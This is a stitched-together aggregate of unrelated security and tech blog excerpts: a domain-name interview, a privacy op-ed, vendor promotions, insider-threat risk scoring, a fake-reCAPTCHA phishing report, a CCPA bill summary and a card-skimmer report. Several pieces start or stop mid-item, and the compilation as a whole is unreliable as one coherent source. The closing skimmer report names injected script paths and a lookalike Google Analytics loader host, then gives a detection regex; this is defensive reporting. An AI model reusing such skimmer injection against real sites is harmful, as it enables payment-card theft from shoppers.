A: The idea came to me and Venga co-founder, Sam Pollaro, about 17 years ago, during the advent of the daily deals sites, such as Groupon and LivingSocial. As you know, these deals were very advantageous to the diner, but we recognized there was an opportunity to help restaurants take control of their own marketing and better connect with their diners. So, we provided them with a platform where they could upload any kind of marketing offer, such as happy hour, fresh catch of the day or a discount.
Q: How has Venga evolved over the years?
A: Venga 1.0 was sort of a marketing tool that allowed restaurants to connect with guests directly through their social media channels and websites, in addition to an app that we developed. Then in 2013, a celebrity chef, one of the first adopters of that app, challenged us to help him find a better way to understand his customers and existing diners because, quite frankly, retaining a guest is a lot less expensive than acquiring a new one.
So, over the next several years, we built out a suite of tools, using well known online reservation tools and point-of-sale integration, that really connected the dots between guests and their purchases. Today, it means restaurants and fitness studios are able to track and analyze their customers’ purchases, habits and preferences to personalize the guest experience, power targeted marketing and build true loyalty.
Q: Your domain name, GetVenga.com, is very catchy. How did you choose it for your online presence?
A: When you’re looking at domain names, you want what’s easily memorable, but also connotes what your company does. In Italian and Spanish, Venga means “come join us.” Obviously in restaurant-speak, it’s all about having a great time and feeling like a family.
We went for GetVenga.com because we wanted people to “get Venga.” We could’ve gotten another extension, but ultimately, we wanted to find a dot com because that connotes trust and established companies. For us, it wasn’t even a close call.
Q: Tell us about Venga’s online presence in the beginning and how it’s evolved.
A: If you were to go back in a time machine and compare our website then and now, you’d be amazed! Basically, it was just me and Sam trying to put together a website. Over the years, we’ve brought on a great team who’ve redesigned it to create a compelling site, with information about our products, case studies from great brands, and a blog focused on thought leadership.
Our domain name presence is truly the critical lifeblood to our business. And for us, the key to our website is to keep it engaging. It’s the best way to reach potential customers and a great way for anyone to get a real understanding of who we are…where people can go and see a true reflection of us as a company.
Q: What do you hope your website provides you in the future?
A: We often ask ourselves “are we only staying in hospitality and fitness? Or are we looking to expand into other industries?”
Right now, we have two products going to one website. But as we continue to grow and develop more features, there’s a good possibility that we may register other domain names and create microsites. And when that opportunity comes, I can tell you right now that we’re going to consistently stay with dot com. It just connotes maturity and trustworthiness.
Q: Any advice you would give to a startup company?
A: Three things. First, when you’re building your website, show the value proposition of what you’re doing to your audience with a side of fun. You don’t want to come off as immature, but you shouldn’t be afraid to show a little personality. Secondly, take time to research the great, new interactive features that will make your website feel more advanced. It goes a long way. And thirdly, get a dot com.
Subscribe to the Verisign blog to have future posts delivered directly to your inbox.
The post Tech Company Takes “Dine and Dash” to a Whole New Level appeared first on Verisign Blog.
Privacy is a human right, and online privacy should be no exception.
Yet, as the US considers new laws to protect individuals’ online data, at least two proposals—one statewide law that can still be amended and one federal draft bill that has yet to be introduced—include an unwelcome bargain: exchanging money for privacy.
This framework, sometimes called “pay-for-privacy,” is plain wrong. It casts privacy as a commodity that individuals with the means can easily purchase. But a move in this direction could further deepen the separation between socioeconomic classes. The “haves” can operate online free from prying eyes. But the “have nots” must forfeit that right.
Though this framework has been used by at least one major telecommunications company before, and there are no laws preventing its practice today, those in cybersecurity and the broader technology industry must put a stop to it. Before pay-for-privacy becomes law, privacy as a right should become industry practice.
Data privacy laws prove popular, but flawed
Last year, the European Union put into effect one of the most sweeping set of data privacy laws in the world. The General Data Protection Regulation, or GDPR, regulates how companies collect, store, share, and use EU citizens’ data. The law has inspired countries everywhere to follow suit, with Italy (an EU member) issuing regulatory fines against Facebook, Brazil passing a new data-protective bill, and Chile amending its constitution to include data protection rights.
The US is no exception to this ripple effect.
In the past year, Senators Ron Wyden of Oregon, Marco Rubio of Florida, Amy Klobuchar of Minnesota, and Brian Schatz of Hawaii (joined by 14 other senators as co-sponsors) proposed separate federal bills to regulate how companies collect, use, and protect Americans' data.
Sen. Rubio’s bill asks the Federal Trade Commission to write its own set of rules, which Congress would then vote on two years later. Sen. Klobuchar’s bill would require companies to write clear terms of service agreements and to send users notifications about privacy violations within 72 hours. Sen. Schatz’s bill introduces the idea that companies have a “duty to care” for consumers’ data by providing a “reasonable” level of security.
But it is Sen. Wyden’s bill, the Consumer Data Protection Act, that stands out, and not for good reason. Hidden among several privacy-forward provisions, like stronger enforcement authority for the FTC and mandatory privacy reports for companies of a certain size, is a dangerous pay-for-privacy stipulation.
According to the Consumer Data Protection Act, companies that require user consent for their services could charge users a fee if those users have opted out of online tracking.
If passed, here’s how the Consumer Data Protection Act would work:
Say a user, Alice, no longer feels comfortable having companies collect, share, and sell her personal information to third parties for the purpose of targeted ads and increased corporate revenue. First, Alice would register with the Federal Trade Commission’s “Do Not Track” website, where she would choose to opt-out of online tracking. Then, online companies with which Alice interacts would be required to check Alice’s “Do Not Track” status.
If a company sees that Alice has opted out of online tracking, that company is barred from sharing her information with third parties and from following her online to build and sell a profile of her Internet activity. Companies that are run almost entirely on user data—including Facebook, Amazon, Google, Uber, Fitbit, Spotify, and Tinder—would need to heed users’ individual decisions. However, those same companies could present Alice with a difficult choice: She can continue to use their services, free of online tracking, so long as she pays a price.
This represents a literal price for privacy.
Electronic Frontier Foundation Senior Staff Attorney Adam Schwartz said his organization strongly opposes pay-for-privacy systems.
“People should be able to not just opt out, but not be opted in, to corporate surveillance,” Schwartz said. “Also, when they choose to maintain their privacy, they shouldn’t have to pay a higher price.”
Pay-for-privacy schemes can come in two varieties: individuals can be asked to pay more for more privacy, or they can pay a lower (discounted) amount and be given less privacy. Both options, Schwartz said, incentivize people not to exercise their privacy rights, either because the cost is too high or because the monetary gain is too appealing.
Both options also harm low-income communities, Schwartz said.
“Poor people are more likely to be coerced into giving up their privacy because they need the money,” Schwartz said. “We could be heading into a world of the ‘privacy-haves’ and ‘have-nots’ that conforms to current economic statuses. It’s hard enough for low-income individuals to live in California with its high cost-of-living. This would only further aggravate the quality of life.”
Unfortunately, a pay-for-privacy provision is also included in the California Consumer Privacy Act, which the state passed last year. Though the law includes a “non-discrimination” clause meant to prevent just this type of practice, it also includes an exemption that allows companies to provide users with “incentives” to still collect and sell personal information.
In a larger blog about ways to improve the law, which was then a bill, Schwartz and other EFF attorneys wrote:
“For example, if a service costs money, and a user of this service refuses to consent to collection and sale of their data, then the service may charge them more than it charges users that do consent.”
The alarm for pay-for-privacy isn’t theoretical—it has been implemented in the past, and there is no law stopping companies from doing it again.
In 2015, AT&T offered broadband service for a $30-a-month discount if users agreed to have their Internet activity tracked. According to AT&T’s own words, that Internet activity included the “webpages you visit, the time you spend on each, the links or ads you see and follow, and the search terms you enter.”
Paying for privacy isn't always so obvious, with real dollars coming out of or going into a user's wallet or checking account. More often, it happens behind the scenes, and it isn't the user getting richer—it's the companies.
Powered by mountains of user data for targeted ads, Google-parent Alphabet recorded $32.6 billion in advertising revenue in the last quarter of 2018 alone. In the same quarter, Twitter recorded $791 million in ad revenue. And, notable for its CEO’s insistence that the company does not sell user data, Facebook’s prior plans to do just that were revealed in documents posted this week. Signing up for these services may be “free,” but that’s only because the product isn’t the platform—it’s the user.
A handful of companies currently reject this approach, though, refusing to sell or monetize users’ private information.
As for Google's very first product, online search, the clearest privacy alternative is DuckDuckGo. The privacy-focused service does not track users' searches, and it does not build individualized profiles of its users to deliver unique results.
Even without monetizing users’ data, DuckDuckGo has been profitable since 2014, said community manager Daniel Davis.
“At DuckDuckGo, we’ve been able to do this with ads based on context (individual search queries) rather than personalization.”
Davis said that DuckDuckGo’s decisions are steered by a long-held belief that privacy is a fundamental right. “When it comes to the online world,” Davis said, “things should be no different, and privacy by default should be the norm.”
It is time other companies follow suit, Davis said.
“Control of one’s own data should not come at a price, so it’s essential that [the] industry works harder to develop business models that don’t make privacy a luxury,” Davis said. “We’re proof this is possible.”
Hopefully, other companies are listening, because it shouldn’t matter whether pay-for-privacy is codified into law—it should never be accepted as an industry practice.
Are you still breakdancing? Storing data on your floppy disk? Performing your searches through the card catalog? Assuming the answer is no, then why are you still using an on-premises application security solution?
In all seriousness, take a look at the benefits, and cost savings, you would see with a cloud-based AppSec solution:
Start scanning immediately: No need to install servers and tools, no need to hire consultants or security specialists to get up and running. On-premises solutions require significant upfront implementation and equipment costs. In addition, on-premises solutions typically require specialized experts to install and run. The security experts who can install, configure, and maintain these tools, as well as respond to the information they return, are expensive and in short supply.
Easily accommodate large and distributed teams: In today’s environment, teams are rarely in one location. With cloud solutions, disparate teams can work seamlessly together.
Scale without friction: When an on-premises application security program needs to be scaled, enterprises frequently need to track down more of those hard-to-find security specialists and install more servers. A cloud-based solution scales without either.
Continuously learning and improving: Unlike an on-premises AppSec solution, a cloud-based solution is continuously gathering more information, learning, and improving. With this feature, it’s less likely that developers will get bogged down with false positives because the platform is continuously learning to adapt to evolving threats.
Mobile access: Mobile access is available with a cloud solution, but not always with an on-premises solution.
As progressive organizations seek the best possible solution for addressing the challenge of application security, they're looking for speed, scale, and simplicity. These are exactly where on-premises software falls short. So why are some companies still holding on to a thing of the past?
In conclusion, let's keep the '80s where they belong: back in the '80s (except for some of the music; some of the music is worth keeping).
Need more convincing? Check out some of the related content below.
Guide: Cloud vs. On-Premises Guide
Headed to RSA? Here are some ideas of things to do!
RSA Conference 2019 is just around the corner! Make the most of your time in San Francisco by filling your time with some classic San Francisco activities, and of course, making time for some show-related activities.
5. Ghirardelli Square
Stop by for something sweet at a National Historic site: Ghirardelli Square. Explore unique shops and restaurants at one of San Francisco's most iconic landmarks.
4. Pier 39
Take in stunning views, enjoy local musicians, and see some bathing sea lions! Check out Pier 39 for a variety of activities and local San Franciscan culture.
3. Chinatown
Many people call Chinatown "San Francisco's Most Iconic Neighborhood." Explore one of the largest hubs of Asian culture in the US for a taste of amazing food and Chinese architecture.
2. Ferry Building
San Francisco’s most iconic landmark is a can’t-miss spot. Enjoy food from local merchants and soak up the historical impact of the world class San Francisco Ferry Building.
1. See a Demo and Party with Us!
We'll be in North Hall, Booth #6570 all week at RSA Conference. Stop by our booth to get a demo of our platform and grab one of our famous t-shirts! Looking for after-hours fun? People are still talking about the party of the century, aka our party at RSA 2018. Don't miss out on this year's event! We've partnered with DomainTools and Tessian to bring you a night you won't forget. RSVP here.
The post 5 Things to Do at RSA 2019 appeared first on ThreatConnect | Intelligence-Driven Security Operations.
With many IT projects, security is often an afterthought, but that approach puts the business at significant risk. The rise of IoT adds orders of magnitude more devices to a network, which creates many more entry points for threat actors to breach. A bigger problem is that many IoT devices are easier to hack than traditional IT devices, making them the endpoint of choice for the bad guys.
IoT is widely deployed in a few industries, but for most businesses it is still in the early innings. For those just starting out, IT and security leaders should be laying out security plans for their implementations now. However, the security landscape is wide and confusing, so how to secure an IoT deployment may not be obvious. Below are three things you must consider when creating an IoT security plan.
Worse, attackers have already been spotted targeting the flaw to deliver cryptocurrency miners and other payloads
The post ‘Highly critical’ bug exposes unpatched Drupal sites to attacks appeared first on WeLiveSecurity
In late November, KeepSolid rolled out VPN Unlimited 5.0 for Mac and Windows. Where the previous version of VPN Unlimited was a mess of options and information overload, VPN Unlimited 5.0 is more streamlined to help you get online faster.
Overall, KeepSolid is a pretty good service with reliable but not blazing fast speeds. It’s also a good platform for accessing streaming services like Netflix, whether you’re overseas or just securing your connection at an airport.
Note: This review is part of our best VPNs roundup. Go there for details about competing products and how we tested them.
Following the revelation that a list containing millions of stolen usernames and passwords had appeared online, we tell you a few different ways to find out if your credentials were stolen in that—or any other—security breach
The post How to spot if your password was stolen in a security breach appeared first on WeLiveSecurity
Healthcare has traditionally had a weaker security profile than most other industries. On the one hand, it is a favorite target for ransomware attacks, and for hackers looking to steal confidential patient records that have a high resale value on the black market. On the other, healthcare experiences more insider attacks than any other industry.
Recent research reveals that healthcare companies face their biggest threats from malicious insiders that abuse their access privileges to view or exfiltrate personally identifiable information (PII) and protected health information (PHI) data. Verizon’s 2018 Protected Health Information Data Breach Report noted that 58 percent of data breaches in healthcare stem from employees or contractors.
Clearly, payers and providers are severely challenged to prevent both insider and outsider attacks on patient and corporate data.
To limit these threats, progressive organizations are using real-time analytics and risk-scoring to automate security controls. This approach monitors the behavior of users and devices, and applies analytics to risk-score them. When anomalies from normal patterns are detected, the risk score increases.
The Insider Threat Landscape
Insider threats pose the biggest challenges to healthcare organizations because they can happen without triggering any security alarms.
A trusted employee can steal confidential patient and corporate information, or tamper with it, and even sabotage systems. While many insider attacks are carried out by disgruntled employees, some can be unintended or simply human error. For example, an employee might mistakenly send confidential information to another employee or to an outsider, or give network access to someone who should not have it.
In some cases, outsiders use social engineering to trick employees into giving up their account credentials. Such ploys include a spoofed email, phishing scheme or a “call from IT” seeking a person’s ID and password.
Top Insider Violations
Some of the most common insider threat incidents in healthcare include:
- Snooping on the medical records of friends, family, neighbors, and celebrities
- Sending sensitive data to personal accounts, competitors, or bad actors
- Printing, downloading and exporting patient records and reports
Most of these activities can be partially addressed by monitoring activity logs from Electronic Medical Records (EMR) Systems such as Allscripts, Cerner, and Epic and from security tools including firewalls, VPNs, etc. However, manual monitoring is incapable of identifying and remediating threats in real-time. This is where data analytics come into play.
Security analytics powered by machine learning enables healthcare organizations to analyze large volumes of data in real time and to predict anomalous behaviors. Machine learning uses historical data to create behavior baselines for users, devices, and other entities.
These baselines, which are used to identify deviations from normal patterns, are self-adjusting and change as the user and entity behaviors change. Such capabilities can be used not just to monitor behaviors, but to assign risk scores to individual users and devices — resulting in highly accurate information that singles out potentially risky activity in real time.
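As a rough illustration of the baselining idea described above, here is a toy Python sketch that scores how far a user's observed activity deviates from their historical norm. The z-score model and the 0–100 scale are assumptions for illustration, not any vendor's actual algorithm.

```python
from statistics import mean, stdev

def risk_score(history, observed):
    """Score how far an observed daily count deviates from a user's baseline.

    `history` is a list of past daily event counts (e.g. patient records
    viewed). This is a toy z-score baseline mapped onto a 0-100 scale;
    real products use far richer behavioral models.
    """
    baseline = mean(history)
    spread = stdev(history) or 1.0  # avoid division by zero on flat history
    z = (observed - baseline) / spread
    # Clamp the scaled deviation into a bounded 0-100 risk score.
    return max(0.0, min(100.0, z * 20))

# A user who normally views ~10 records suddenly views 60:
normal = [9, 11, 10, 12, 8, 10, 11]
print(risk_score(normal, 60))  # 100.0 (clamped: extreme deviation)
print(risk_score(normal, 10))  # 0.0 (within the baseline)
```

Because the baseline is recomputed from recent history, the score self-adjusts as a user's normal behavior drifts, which is the property the text describes.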
Analytics and risk scoring facilitate the automation and orchestration of security decisions. Sometimes called model-driven security, this approach can respond to threats with the speed and accuracy of a machine by enforcing new controls when activity exceeds pre-determined risk thresholds.
Real-time Detection and Prevention of Insider Threats
As a real-time security control, model-driven security collects all enterprise intelligence data that can be correlated back to a single user identity, such as proxy logs, entitlements, actions taken using those entitlements, and essentially anything else that can be brought back into a data warehouse. Then, behavioral models are applied to the data to develop a risk score for users within the company.
Risk scores are like credit scores. The same way a credit score goes up and down depending on money owed and payment history, a user’s risk score fluctuates depending on the actions taken while using their access permissions. The risk score is adjusted dynamically, based on a user’s behavior.
In this way, an insider’s risk score can serve as a dynamic security control. If the score is high, the organization can block the user’s account. Or, if it’s medium-risk, the user can be prompted to call in to the help desk to verify his or her identity. This has been historically impossible to do without the ability to risk score users dynamically. When a user’s risk score increases in a short amount of time, or exceeds a threshold, the organization can send out an alert, lock an IP address, restrict all traffic via DLP, open a security incident, etc.
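The threshold-driven controls described here could be sketched roughly as follows. The cutoffs and action names are illustrative assumptions; a real deployment would tune the thresholds and wire the actions into identity, SOAR, and DLP tooling.

```python
def respond_to_risk(score):
    """Map a dynamic risk score to an automated security action.

    Thresholds and action names are illustrative, not prescriptive.
    """
    if score >= 80:
        return "block_account"                 # high risk: disable access
    if score >= 50:
        return "require_identity_verification"  # e.g. call the help desk
    if score >= 30:
        return "alert_security_team"            # open a security incident
    return "allow"                              # normal behavior

print(respond_to_risk(90))  # block_account
print(respond_to_risk(55))  # require_identity_verification
print(respond_to_risk(10))  # allow
```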
Risk-scoring using analytics enables healthcare organizations to predict, detect and prevent insider threats, in ways that are impossible using static rules. It reduces much of the friction imposed by conventional security mechanisms, while providing continuous risk monitoring and real-time intervention when and where warranted.
About the author: Nilesh Dherange is CTO of security and fraud analytics vendor Gurucul, and an expert on identity, data science and machine learning. Nilesh was an integral member of identity technology vendor Vaau, which was acquired by Sun Microsystems. He also co-founded BON Marketing Group and created BON Ticker — a predictive analytics tool for online advertising.
These days, cyberattacks can feel relentless. Due to the interconnected nature of the world we live in, cybercriminals have managed to infiltrate our personal devices, our networks, and even our homes. That’s why we at McAfee believe it’s important now more than ever to secure every facet of the modern consumer lifestyle. And we’ve partnered with Telefónica to do just that.
This partnership first began back in February of last year, when ElevenPaths, Telefónica Cyber Security Unit, and McAfee announced we’re working together to reinforce the online security of Telefónica’s broadband and mobile customers across multiple markets. This partnership covers Europe and Latin America, with plans to progressively roll out solutions in the different countries where Telefónica operates. It’s the first time a telecommunications company has delivered a security service to all of its customers, regardless of where they connect from.
Fast forward to present day, and this partnership has only expanded. The global product developed by Telefónica and powered by McAfee was first launched in Spain as Movistar Conexión Segura, a service that protects home and mobile customers’ connectivity. Telefónica protects Fusión customers’ home connections with a smart router, thanks to the ElevenPaths solution powered by McAfee Secure Home Platform, which enables seamless security and easy activation. Conexión Segura is also available for Movistar mobile customers, including network protection and one license of Seguridad Dispositivo, a multi-device security protection.
Only a few weeks after Spain, Movistar Argentina launched the solution for its fixed and mobile customers. These services help realize Telefónica’s “Security by Default” strategy, offering customers a more robust security solution that protects against threats like viruses, malware, phishing, and emerging IoT threats.
Telefónica and McAfee’s 360 partnership is dedicated to protecting the productivity of consumers everywhere. “This agreement gives customers current and contextual information on their cybersecurity status so they can stay connected with confidence,” said Pedro Pablo Pérez, Global Security VP of Telefónica and CEO of ElevenPaths, Telefónica Cybersecurity Unit.
ElevenPaths and McAfee’s joint vision to create a more secure tomorrow brings us a step closer to stopping widespread cyberattacks. By joining forces to implement more robust security solutions around the world, we can ensure that our connectivity goes undisrupted. Because together is power.
The post McAfee Partners With Telefónica To Help Secure Consumers Worldwide appeared first on McAfee Blogs.
This time last year, we said that 2018 would be the year of mobile malware.
Today at MWC, we’re calling 2019 the year of everywhere malware.
In their quest for profit, criminals are constantly forced to shift their tactics and adapt to a changing mobile market. Take crypto-mining, for example. A year ago this was a relatively hassle-free way of making money. But the bottom dropped out of the crypto-currency market over the course of 2018. Now it’s not as lucrative, so we witness more aggressive forms of ransomware that make payment more likely.
Our latest Mobile Threat Report has revealed a huge increase in backdoors, fake apps and banking Trojans. Hidden apps are being exploited as quickly as app stores can take them down and adversaries are adapting and developing new threats. The number of attacks on other connected things is growing too – your voice assistant might even be letting criminals into your home. And smartphones, of course, remain a prime target.
In particular, the use of banking Trojans to steal financial credentials has exploded. Their popularity is growing so fast that we saw the number of incidents double between June and September last year. They then spiked by a further 75 percent in December. Android users in particular are being targeted, as malware authors find new ways of bypassing Google’s security. Unfortunately for consumers, these Trojans represent a solid source of income for cybercriminals so, for the foreseeable future at least, we can expect them to continue to evolve and become more sophisticated.
A worrying new trend sees attacks extending beyond mobile apps and operating systems and into our homes. Smart home tech is becoming integral to our domestic lifestyle – there are already over 25 million voice assistants such as Google Home and Alexa in our homes, and this is expected to grow to as many as 275 million within the next five years. Add to this a growing number of connected thermostats, locks and doorbells, and this represents a huge – and hugely attractive – attack vector for cybercriminals. The quirks and vulnerabilities of these devices, coupled with weak to non-existent security controls could provide unfettered access to the rest of your home network.
At the heart of all of this, of course, lies the smartphone. The control hub and gateway to the voice assistants and smart devices we engage with on a day-to-day basis, these devices track where we are, what we’re doing, and often hold important personal information. Access to our smartphones is clearly worth its weight in gold to criminals. After all, from here they steal our bank details and even make their way into our homes. And with new malware families especially designed to trick smartphone users into giving them access, that’s just what they’re trying to do.
The mobile ecosystem is continually changing. Operators and developers can get wise to tactics used by criminals but criminals will never give up in their pursuit for profit. If one door closes on them, they’ll just open another one. They’ll change their tactics and broaden their efforts to target more aspects of our increasingly ubiquitous mobile use.
That’s why the entire tech industry, from smart device and mobile manufacturers to developers and app store owners, must work more closely together. Only then will we be able to tackle this insidious threat and protect consumers at every point of their increasingly digital lives.
To find out more, see our latest Mobile Threat Report here.
The post In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware appeared first on McAfee Blogs.
So what is wild on the web this year? Need to know about the most critical web vulnerabilities in 2019 to protect your organization?
Well, luckily for you, Acunetix compiles an annual web application vulnerability report, a fairly hefty piece of analysis of data gathered over the previous year. It is compiled from the automated web and network perimeter scans run on the Acunetix Online platform over a 12-month period, across more than 10,000 scan targets.
- A number of ongoing out-in-the-wild attacks
- Another early-warned Drupal vulnerability
- A 19-year-old flaw in an obscure decompressor for the "ACE" archive format
- Microsoft reveals an abuse of HTTP/2 protocol which is DoSing its IIS servers.
- Mozilla faces a dilemma about a wanna-be Certificate Authority and they also send a worried letter to Australia.
- Microsoft's Edge browser is revealed to be secretly whitelisting 58 web domains which are allowed to bypass its "Click-To-Run" permission for Flash.
- ICANN renews its plea for the Internet to adopt DNSSEC.
- NVIDIA releases a handful of critical driver updates for Windows.
- Apple increases the intelligence of its Intelligent Tracking Prevention.
We invite you to read our show notes at https://www.grc.com/sn/SN-703-Notes.pdf
Download or subscribe to this show at https://twit.tv/shows/security-now.
You can submit a question to Security Now! at the GRC Feedback Page.
Journalists covering the arrival of caravans of migrants from Central America along the U.S. southern border have faced harassment, additional screenings, and targeting by both U.S. and Mexican authorities.
The U.S. Press Freedom Tracker has documented at least five journalists who have been stopped on the U.S. side of the border since December 2018 in the course of doing their jobs covering the migrant caravan. Some have been stopped numerous times and put in situations that could threaten their privacy, reporting processes, and confidential sources.
In addition, Mexican authorities denied entry to at least two journalists — along with two immigration attorneys — who were attempting to travel to the country last month, making headlines and sparking concerns about public access and press freedom issues along the border.
The accounts of the journalists — Kitra Cahana and Daniel Ochoa — and of the attorneys were nearly identical. Mexican authorities detained them when they attempted to enter, informed them that their passports were “flagged,” and then turned them away.
“I’m in limbo,” Cahana told the Los Angeles Times. “What kind of list am I on? Who put me on this list? And how many journalists is this affecting?”
It’s unclear whether it was the Mexican or United States government that placed an alert on their travel documents, but both journalists reported that their passports had previously been photographed by both U.S. and Mexican authorities.
These passport alerts have not only impacted journalists trying to enter Mexico, but also those attempting to enter the United States. While entering the country via San Diego at the end of last year, freelance journalist Ariana Drehsler was told by border authorities that her passport had been flagged, but that they did not know why.
Customs and Border Protection did not provide details on what these “flags” on passports like Drehsler’s might be or why they may have been placed. But since then, she has been subjected to secondary screenings — including questionings that made her feel like “an informant,” and searches — every time she has entered the United States. She isn’t the only one.
Manuel Rapalo, a journalist who freelances for Al Jazeera, said he has been stopped at least three times at the U.S.-Mexico border in 2019. (Read details about each border stop on the US Press Freedom Tracker.)
Out of concern about the frequency of equipment searches during these stops, he said he has changed his behavior to ensure his sources and reporting materials are protected. He brings new memory cards with him on each reporting trip to minimize what material could end up in border officials’ hands.
The numerous journalists stopped at the border and questioned about their work while covering the arrival of Central American immigrants to Mexico aren’t the only ones who have been targeted by CBP recently. In January, a filmmaker had his device taken by border officials, who demanded he unlock his phone and then took it into a different room. And when an Al Jazeera anchor had his device seized at the border, CBP agents asked him about his social media accounts.
A recent report by the Committee to Protect Journalists found that between 2006 and June 2018, the 37 journalists surveyed for the report were collectively stopped for screenings more than 110 times. In many cases, journalists were asked to unlock their electronic devices, answer invasive questions about their reporting, and had their personal belongings searched. In a particularly egregious case in 2016, well-known photojournalist and Canadian citizen Ed Ou was even denied entry into the United States.
CPJ found that CBP’s broad and relatively unchecked powers pose a significant press freedom threat — particularly since the agency can share the information it gains from journalists’ devices, including sources and sensitive documents, with other federal agencies.
“With a more aggressive administration openly hostile to the press and leaks, CBP should implement tighter guidelines to protect the First Amendment rights of all individuals crossing the border,” CPJ concluded.
“Press freedom rights should not cease at the border,” said Freedom of the Press Foundation Executive Director Trevor Timm. “These egregious and invasive border stops are a threat to both journalists and their sources, and they give authoritarian countries every excuse to use similar tactics on their borders as well. CBP and the Trump administration need to publicly account for these disturbing events.”
The BRONZE UNION threat group focuses on espionage and targets a broad range of organizations and groups using a variety of tools and methods.
A recent phishing campaign used a fake Google reCAPTCHA as part of its efforts to target Polish bank employees with malware.
Sucuri researchers discovered that the campaign sent out malicious emails masquerading as a confirmation for a recent transaction. Digital attackers deployed this disguise in the hopes that employees at the targeted bank would click on a link to a malicious PHP file out of alarm. That file was responsible for loading a fake 404 error page for visitors that had specifically defined user-agents.
At that point, the PHP code checked the victim’s browser user-agent to determine what payload it should deliver. If it found the victim was using an Android device, the attack would load a malicious APK file capable of intercepting two-factor authentication (2FA) codes. Otherwise, it would download a malicious ZIP archive.
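For analysts replaying such a URL in a sandbox, the reported branching logic boils down to a user-agent check. The sketch below mirrors the behavior described above (Android visitors get the 2FA-intercepting APK, everyone else the ZIP archive); the function name is ours, for illustration only.

```python
def expected_payload(user_agent):
    """Predict which payload the reported campaign would serve a visitor.

    Mirrors the described server-side branching: Android user-agents
    receive a malicious APK, all others a malicious ZIP. Useful for
    choosing which user-agent to replay the URL with in a sandbox.
    """
    return "apk" if "android" in user_agent.lower() else "zip"

print(expected_payload("Mozilla/5.0 (Linux; Android 9; SM-G960F)"))   # apk
print(expected_payload("Mozilla/5.0 (Windows NT 10.0; Win64; x64)"))  # zip
```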
A History of Abusing and Bypassing CAPTCHAs
This isn’t the first time threat actors have incorporated CAPTCHAs into their attack campaigns. Back in 2016, researchers at the University of Connecticut and Bar Ilan University identified a malicious attack in which threat actors could trick users into divulging some of their personal information by completing a fake CAPTCHA. In February 2018, My Online Security observed a campaign that used an image pretending to be a Google reCAPTCHA to download a malicious ZIP file.
Malefactors have also tried to bypass legitimate CAPTCHAs for the purpose of conducting attack campaigns. All the way back in 2009, for example, IT World reported on a worm named Gaptcha that circumvented Gmail’s authentication feature to create new dummy accounts from which to send spam mail. More recently, BullGuard discovered some survey scams using CAPTCHAs to make their ploys more believable.
Defending Against Fake reCAPTCHA Phishing Campaigns
Security professionals can help protect their organizations from fake reCAPTCHA-wielding phishing campaigns by taking an ahead-of-threat approach to detection. Companies should also reject SMS-based 2FA schemes in favor of more practical and convenient multifactor authentication (MFA) deployments that fit into a context-based access strategy.
The post Phishing Campaign Uses Fake Google reCAPTCHA to Distribute Malware appeared first on Security Intelligence.
On February 22, 2019, California state senator Hannah-Beth Jackson introduced a bill (SB-561) that would amend the California Consumer Privacy Act of 2018 (“CCPA”) to expand the Act’s private right of action and remove the 30-day cure period requirement for enforcement actions brought by the State Attorney General. The bill would not change the compliance deadline for the CCPA, which remains January 1, 2020. California Attorney General Xavier Becerra supports the amendment bill, characterizing it as “a critical measure to strengthen and clarify the CCPA.”
If passed, the bill would amend the CCPA as follows:
- Private Right of Action
- Expand the civil right of action for damages to apply to any consumer whose rights under the CCPA are violated.
- The private right of action under the CCPA is currently limited to instances in which a consumer’s nonencrypted or nonredacted personal information is subject to unauthorized access and exfiltration, theft or disclosure as a result of a business’s failure to maintain reasonable security procedures.
- The proposed amendment would allow consumers whose rights under the CCPA are violated to bring a private right of action against a business.
- No other sections of the private right of action provision would change.
- Penalties for violations of the Act remain unchanged:
- $100-$750 per consumer per incident or actual damages, whichever is greater;
- Injunctive or declaratory relief; and
- Any other relief the court deems proper.
- 30-day cure period provision remains unchanged:
- For an action for statutory damages, a consumer must still provide a business with 30 days’ written notice and an opportunity to cure the violation. If within the 30 days the business cures the violation and provides the consumer an express written statement that the violations have been cured and that no further violations shall occur, the consumer would be barred from bringing an action for individual statutory damages or class-wide statutory damages.
- For an action for actual damages, as under the current language of the CCPA, a consumer is not required to provide a business with 30 days’ notice and an opportunity to cure.
- Penalties for violations of the Act remain unchanged:
- Expand the civil right of action for damages to apply to any consumer whose rights under the CCPA are violated.
- California Attorney General Enforcement
- Remove the 30-day cure period for enforcement actions brought by the California Attorney General.
- The CCPA currently states that a business shall only be in violation of the CCPA if it fails to cure any alleged violation of the CCPA within 30 days after being notified of alleged noncompliance.
- The proposed amendment would remove this provision, allowing the California Attorney General to bring enforcement actions for violations of the CCPA even when a business has “cured” the alleged violations.
- End the ability to seek guidance from the California Attorney General about how to comply with the CCPA.
- The CCPA currently provides the opportunity for any business or third party to seek the opinion of the California Attorney General for guidance on how to comply with the CCPA.
- The bill would eliminate this provision and instead state that the Attorney General “may publish materials that provide businesses and others with general guidance” on how to comply with the CCPA.
- The penalties the California Attorney General can bring for violations of the CCPA remain the same:
- Injunction; and
- Civil penalties of up to $2,500 for each violation or $7,500 for each intentional violation.
- Remove the 30-day cure period for enforcement actions brought by the California Attorney General.
If passed, the expanded private right of action provision would significantly increase businesses’ liability risks under the CCPA. While the California Attorney General is limited in his ability to bring enforcement actions until six months after the passage of implementing regulations or July 1, 2020, whichever comes first, consumers may bring private rights of action beginning on January 1, 2020, the CCPA’s compliance deadline. Businesses therefore should be prepared to comply with the CCPA by January 1, 2020.
Over the last few months, we’ve noticed several credit card-stealing scripts that use variations of the Google Analytics name to make them look less suspicious and evade detection by website owners.
The malicious code is obfuscated and injected into legitimate JS files, such as skin/frontend/default/theme122k/js/jquery.jscrollpane.min.js, js/meigee/jquery.min.js, and js/varien/js.js.
The obfuscated code loads another script from www.google-analytics[.]cm/analytics.js.
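Defenders can hunt for this trick by flagging domains that look like Google Analytics but carry the wrong TLD (here, .cm instead of .com). A rough Python sketch; the regex is illustrative, not an exhaustive lookalike catalog.

```python
import re

# Matches google-analytics-style domains whose TLD is NOT .com,
# e.g. the google-analytics.cm host used in these skimming campaigns.
LOOKALIKE = re.compile(
    r"google[-_.]?analytics?\.(?!com\b)[a-z]{2,3}\b", re.IGNORECASE)

def flag_suspicious_domains(script_text):
    """Return lookalike analytics domains found in a JavaScript blob."""
    return sorted({m.group(0).lower() for m in LOOKALIKE.finditer(script_text)})

js = 'var s = "https://www.google-analytics.cm/analytics.js";'
print(flag_suspicious_domains(js))  # ['google-analytics.cm']
```

Running the same check over a site's legitimate references to google-analytics.com returns nothing, so the function can be dropped into a periodic integrity scan of served JS files.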
